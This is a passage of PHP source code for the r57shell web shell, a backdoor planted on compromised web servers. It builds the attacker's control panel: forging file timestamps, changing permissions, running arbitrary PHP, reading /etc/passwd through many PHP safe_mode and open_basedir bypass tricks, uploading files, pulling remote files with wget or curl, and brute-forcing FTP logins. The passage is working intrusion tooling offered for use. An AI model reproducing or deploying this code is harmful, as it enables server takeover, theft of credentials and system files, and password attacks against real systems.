<option value="2006">2007</option>

6081
6082
<option value="2006">2008</option>

6083
6084
<option value="2006">2009</option>

6085
6086
<option value="2006">2010</option>

6087
6088
</select>'

6089
6090
.ws(4)."<b>Hour".$arrow."</b>"

6091
6092
.'

6093
6094
<select name="chasi" size="1">

6095
6096
<option value="01">01</option>

6097
6098
<option value="02">02</option>

6099
6100
<option value="03">03</option>

6101
6102
<option value="04">04</option>

6103
6104
<option value="05">05</option>

6105
6106
<option value="06">06</option>

6107
6108
<option value="07">07</option>

6109
6110
<option value="08">08</option>

6111
6112
<option value="09">09</option>

6113
6114
<option value="10">10</option>

6115
6116
<option value="11">11</option>

6117
6118
<option value="12">12</option>

6119
6120
<option value="13">13</option>

6121
6122
<option value="14">14</option>

6123
6124
<option value="15">15</option>

6125
6126
<option value="16">16</option>

6127
6128
<option value="17">17</option>

6129
6130
<option value="18">18</option>

6131
6132
<option value="19">19</option>

6133
6134
<option value="20">20</option>

6135
6136
<option value="21">21</option>

6137
6138
<option value="22">22</option>

6139
6140
<option value="23">23</option>

6141
6142
<option value="24">24</option>

6143
6144
</select>'

6145
6146
.ws(4)."<b>Minute".$arrow."</b>"

6147
6148
.'

6149
6150
<select name="minutes" size="1">

6151
6152
<option value="01">1</option>

6153
6154
<option value="02">2</option>

6155
6156
<option value="03">3</option>

6157
6158
<option value="04">4</option>

6159
6160
<option value="05">5</option>

6161
6162
<option value="06">6</option>

6163
6164
<option value="07">7</option>

6165
6166
<option value="08">8</option>

6167
6168
<option value="09">9</option>

6169
6170
<option value="10">10</option>

6171
6172
<option value="11">11</option>

6173
6174
<option value="12">12</option>

6175
6176
<option value="13">13</option>

6177
6178
<option value="14">14</option>

6179
6180
<option value="15">15</option>

6181
6182
<option value="16">16</option>

6183
6184
<option value="17">17</option>

6185
6186
<option value="18">18</option>

6187
6188
<option value="19">19</option>

6189
6190
<option value="20">20</option>

6191
6192
<option value="21">21</option>

6193
6194
<option value="22">22</option>

6195
6196
<option value="23">23</option>

6197
6198
<option value="24">24</option>

6199
6200
<option value="25">25</option>

6201
6202
<option value="26">26</option>

6203
6204
<option value="27">27</option>

6205
6206
<option value="28">28</option>

6207
6208
<option value="29">29</option>

6209
6210
<option value="30">30</option>

6211
6212
<option value="31">31</option>

6213
6214
<option value="32">32</option>

6215
6216
<option value="33">33</option>

6217
6218
<option value="34">34</option>

6219
6220
<option value="35">35</option>

6221
6222
<option value="36">36</option>

6223
6224
<option value="37">37</option>

6225
6226
<option value="38">38</option>

6227
6228
<option value="39">39</option>

6229
6230
<option value="40">40</option>

6231
6232
<option value="41">41</option>

6233
6234
<option value="42">42</option>

6235
6236
<option value="43">43</option>

6237
6238
<option value="44">44</option>

6239
6240
<option value="45">45</option>

6241
6242
<option value="46">46</option>

6243
6244
<option value="47">47</option>

6245
6246
<option value="48">48</option>

6247
6248
<option value="49">49</option>

6249
6250
<option value="50">50</option>

6251
6252
<option value="51">51</option>

6253
6254
<option value="52">52</option>

6255
6256
<option value="53">53</option>

6257
6258
<option value="54">54</option>

6259
6260
<option value="55">55</option>

6261
6262
<option value="56">56</option>

6263
6264
<option value="57">57</option>

6265
6266
<option value="58">58</option>

6267
6268
<option value="59">59</option>

6269
6270
</select>'

6271
6272
.ws(4)."<b>Second".$arrow."</b>"

6273
6274
.'

6275
6276
<select name="second" size="1">

6277
6278
<option value="01">1</option>

6279
6280
<option value="02">2</option>

6281
6282
<option value="03">3</option>

6283
6284
<option value="04">4</option>

6285
6286
<option value="05">5</option>

6287
6288
<option value="06">6</option>

6289
6290
<option value="07">7</option>

6291
6292
<option value="08">8</option>

6293
6294
<option value="09">9</option>

6295
6296
<option value="10">10</option>

6297
6298
<option value="11">11</option>

6299
6300
<option value="12">12</option>

6301
6302
<option value="13">13</option>

6303
6304
<option value="14">14</option>

6305
6306
<option value="15">15</option>

6307
6308
<option value="16">16</option>

6309
6310
<option value="17">17</option>

6311
6312
<option value="18">18</option>

6313
6314
<option value="19">19</option>

6315
6316
<option value="20">20</option>

6317
6318
<option value="21">21</option>

6319
6320
<option value="22">22</option>

6321
6322
<option value="23">23</option>

6323
6324
<option value="24">24</option>

6325
6326
<option value="25">25</option>

6327
6328
<option value="26">26</option>

6329
6330
<option value="27">27</option>

6331
6332
<option value="28">28</option>

6333
6334
<option value="29">29</option>

6335
6336
<option value="30">30</option>

6337
6338
<option value="31">31</option>

6339
6340
<option value="32">32</option>

6341
6342
<option value="33">33</option>

6343
6344
<option value="34">34</option>

6345
6346
<option value="35">35</option>

6347
6348
<option value="36">36</option>

6349
6350
<option value="37">37</option>

6351
6352
<option value="38">38</option>

6353
6354
<option value="39">39</option>

6355
6356
<option value="40">40</option>

6357
6358
<option value="41">41</option>

6359
6360
<option value="42">42</option>

6361
6362
<option value="43">43</option>

6363
6364
<option value="44">44</option>

6365
6366
<option value="45">45</option>

6367
6368
<option value="46">46</option>

6369
6370
<option value="47">47</option>

6371
6372
<option value="48">48</option>

6373
6374
<option value="49">49</option>

6375
6376
<option value="50">50</option>

6377
6378
<option value="51">51</option>

6379
6380
<option value="52">52</option>

6381
6382
<option value="53">53</option>

6383
6384
<option value="54">54</option>

6385
6386
<option value="55">55</option>

6387
6388
<option value="56">56</option>

6389
6390
<option value="57">57</option>

6391
6392
<option value="58">58</option>

6393
6394
<option value="59">59</option>

6395
6396
</select>'

6397
6398
.in('hidden','cmd',0,'touch')

6399
6400
.in('hidden','dir',0,$dir)

6401
6402
.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

6403
6404
echo $te.'</div>'.$table_end1.$fe;

6405
6406
}

6407
6408
$select='';

6409
6410
if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}

6411
6412
if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}

6413
6414
if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}

6415
6416
if($unix &&$select){

6417
6418
echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;

6419
6420
echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

6421
6422
echo $te.'</div>'.$table_end1.$fe;

6423
6424
}

6425
6426
if(!$safe_mode){

6427
6428
$aliases2 = '';

6429
6430
foreach ($aliases as $alias_name=>$alias_cmd)

6431
6432
{

6433
6434
$aliases2 .= "<option>$alias_name</option>";

6435
6436
}

6437
6438
echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;

6439
6440
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

6441
6442
echo $te.'</div>'.$table_end1.$fe;

6443
6444
}

6445
6446
echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;

6447
6448
echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));

6449
6450
echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");

6451
6452
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));

6453
6454
echo $te.'</div>'.$table_end1.$fe;

6455
6456
if(!$safe_mode &&$unix){

6457
6458
echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;

6459
6460
echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));

6461
6462
echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");

6463
6464
echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));

6465
6466
echo $te.'</div>'.$table_end1.$fe;

6467
6468
}

6469
6470
echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;

6471
6472
echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";

6473
6474
echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));

6475
6476
echo "</textarea>";

6477
6478
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');

6479
6480
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);

6481
6482
echo "</div></div></font>";

6483
6484
echo $table_end1.$fe;

6485
6486
if($safe_mode ||$open_basedir)

6487
6488
{

6489
6490
echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;

6491
6492
echo "<table class=table1 width=100% align=center>";

6493
6494
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6495
6496
echo $te.'</div>'.$table_end1.$fe;

6497
6498
}

6499
6500
if(($safe_mode ||$open_basedir) &&$curl_on &&@version_compare(@phpversion(),"5.2.0")<=0)

6501
6502
{

6503
6504
echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;

6505
6506
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6507
6508
echo $te.'</div>'.$table_end1.$fe;

6509
6510
}

6511
6512
if(($safe_mode ||$open_basedir) &&$mysql_on)

6513
6514
{

6515
6516
echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;

6517
6518
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));

6519
6520
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6521
6522
echo $te.'</div>'.$table_end1.$fe;

6523
6524
}

6525
6526
if(($safe_mode ||$open_basedir) &&$mssql_on)

6527
6528
{

6529
6530
echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;

6531
6532
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));

6533
6534
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6535
6536
echo $te.'</div>'.$table_end1.$fe;

6537
6538
}

6539
6540
if(($safe_mode ||$open_basedir) &&$unix &&@function_exists('mb_send_mail') &&@version_compare(@phpversion(),"5.2.0")<=0){

6541
6542
echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;

6543
6544
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6545
6546
echo $te.'</div>'.$table_end1.$fe;

6547
6548
}

6549
6550
if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_list') &&@version_compare(@phpversion(),"5.2.0")<=0){

6551
6552
echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;

6553
6554
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6555
6556
echo $te.'</div>'.$table_end1.$fe;

6557
6558
}

6559
6560
if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_body') &&@version_compare(@phpversion(),"5.2.0")<=0){

6561
6562
echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;

6563
6564
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6565
6566
echo $te.'</div>'.$table_end1.$fe;

6567
6568
}

6569
6570
if(($safe_mode ||$open_basedir) &&@function_exists('copy') &&@version_compare(@phpversion(),"5.2.0")<=0)

6571
6572
{

6573
6574
echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;

6575
6576
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));

6577
6578
echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6579
6580
echo $te.'</div>'.$table_end1.$fe;

6581
6582
}

6583
6584
if(($safe_mode ||$open_basedir) &&@function_exists('ini_restore') &&@version_compare(@phpversion(),"5.2.0")<=0){

6585
6586
echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;

6587
6588
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6589
6590
echo $te.'</div>'.$table_end1.$fe;

6591
6592
}

6593
6594
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.0.0")<0){

6595
6596
echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;

6597
6598
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6599
6600
echo $te.'</div>'.$table_end1.$fe;

6601
6602
}

6603
6604
if(($safe_mode ||$open_basedir) &&@function_exists('glob') &&@version_compare(@phpversion(),"5.2.2")<=0){

6605
6606
echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;

6607
6608
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6609
6610
echo $te.'</div>'.$table_end1.$fe;

6611
6612
}

6613
6614
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)

6615
6616
{

6617
6618
echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;

6619
6620
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6621
6622
echo $te.'</div>'.$table_end1.$fe;

6623
6624
}

6625
6626
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)

6627
6628
{

6629
6630
echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;

6631
6632
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6633
6634
echo $te.'</div>'.$table_end1.$fe;

6635
6636
}

6637
6638
if(($safe_mode ||$open_basedir) &&@function_exists('error_log') &&@version_compare(@phpversion(),"5.2.2")<=0)

6639
6640
{

6641
6642
echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;

6643
6644
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));

6645
6646
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));

6647
6648
echo $te.'</div>'.$table_end1.$fe;

6649
6650
}

6651
6652
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)

6653
6654
{

6655
6656
echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;

6657
6658
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));

6659
6660
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));

6661
6662
echo $te.'</div>'.$table_end1.$fe;

6663
6664
}

6665
6666
if(($safe_mode ||$open_basedir) &&@function_exists('readfile') &&@version_compare(@phpversion(),"5.2.2")<=0)

6667
6668
{

6669
6670
echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;

6671
6672
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));

6673
6674
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));

6675
6676
echo $te.'</div>'.$table_end1.$fe;

6677
6678
}

6679
6680
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.4")<=0)

6681
6682
{

6683
6684
echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;

6685
6686
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

6687
6688
echo $te.'</div>'.$table_end1.$fe;

6689
6690
}

6691
6692
if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0)

6693
6694
{

6695
6696
echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;

6697
6698
echo "<tr><td valign=top width=70%>".$ts;

6699
6700
echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);

6701
6702
echo $te."</td><td valign=top width=30%>".$ts;

6703
6704
echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);

6705
6706
echo $te."</td></tr>";

6707
6708
echo $te.'</div>'.$table_end1;

6709
6710
}

6711
6712
if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0)

6713
6714
{

6715
6716
echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;

6717
6718
echo "<tr><td valign=top width=70%>".$ts;

6719
6720
echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);

6721
6722
echo $te."</td><td valign=top width=30%>".$ts;

6723
6724
echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);

6725
6726
echo $te."</td></tr>";

6727
6728
echo $te.'</div>'.$table_end1;

6729
6730
}

6731
6732
if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){

6733
6734
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";

6735
6736
echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;

6737
6738
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));

6739
6740
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));

6741
6742
echo $te.'</div>'.$table_end1.$fe;

6743
6744
}

6745
6746
if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){

6747
6748
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";

6749
6750
echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;

6751
6752
echo "<tr><td valign=top width=50%>".$ts;

6753
6754
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));

6755
6756
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));

6757
6758
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));

6759
6760
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));

6761
6762
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));

6763
6764
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));

6765
6766
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));

6767
6768
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));

6769
6770
echo $te."</td><td valign=top width=50%>".$ts;

6771
6772
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));

6773
6774
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));

6775
6776
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));

6777
6778
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));

6779
6780
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));

6781
6782
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));

6783
6784
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));

6785
6786
echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));

6787
6788
echo $te."</td></tr>";

6789
6790
echo $te.'</div>'.$table_end1.$fe;

6791
6792
}

6793
6794
$select='';

6795
6796
if((!@function_exists('ini_get')) ||(@ini_get('allow_url_fopen') &&@function_exists('fopen'))){$select = "<option value=\"fopen\">fopen</option>";}

6797
6798
if(!$safe_mode){

6799
6800
if(which('wget')){$select .= "<option value=\"wget\">wget</option>";}

6801
6802
if(which('fetch')){$select .= "<option value=\"fetch\">fetch</option>";}

6803
6804
if(which('lynx')){$select .= "<option value=\"lynx\">lynx</option>";}

6805
6806
if(which('links')){$select .= "<option value=\"links\">links</option>";}

6807
6808
if(which('curl')){$select .= "<option value=\"curl\">curl</option>";}

6809
6810
if(which('GET')){$select .= "<option value=\"GET\">GET</option>";}

6811
6812
}

6813
6814
if($select){

6815
6816
echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;

6817
6818
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\">".$select

6819
6820
."</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));

6821
6822
echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));

6823
6824
echo $te.'</div>'.$table_end1.$fe;

6825
6826
}

6827
6828
echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;

6829
6830
echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));

6831
6832
$arh = $lang[$language.'_text92'];

6833
6834
if(@function_exists('gzcompress')) {$arh .= in('radio','compress',0,'zip').' zip';}

6835
6836
if(@function_exists('gzencode'))   {$arh .= in('radio','compress',0,'gzip').' gzip';}

6837
6838
if(@function_exists('bzcompress')) {$arh .= in('radio','compress',0,'bzip').' bzip';}

6839
6840
echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);

6841
6842
echo $te.'</div>'.$table_end1.$fe;

6843
6844
if(@function_exists("ftp_connect")){

6845
6846
echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;

6847
6848
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";

6849
6850
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));

6851
6852
echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");

6853
6854
echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);

6855
6856
echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);

6857
6858
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));

6859
6860
echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));

6861
6862
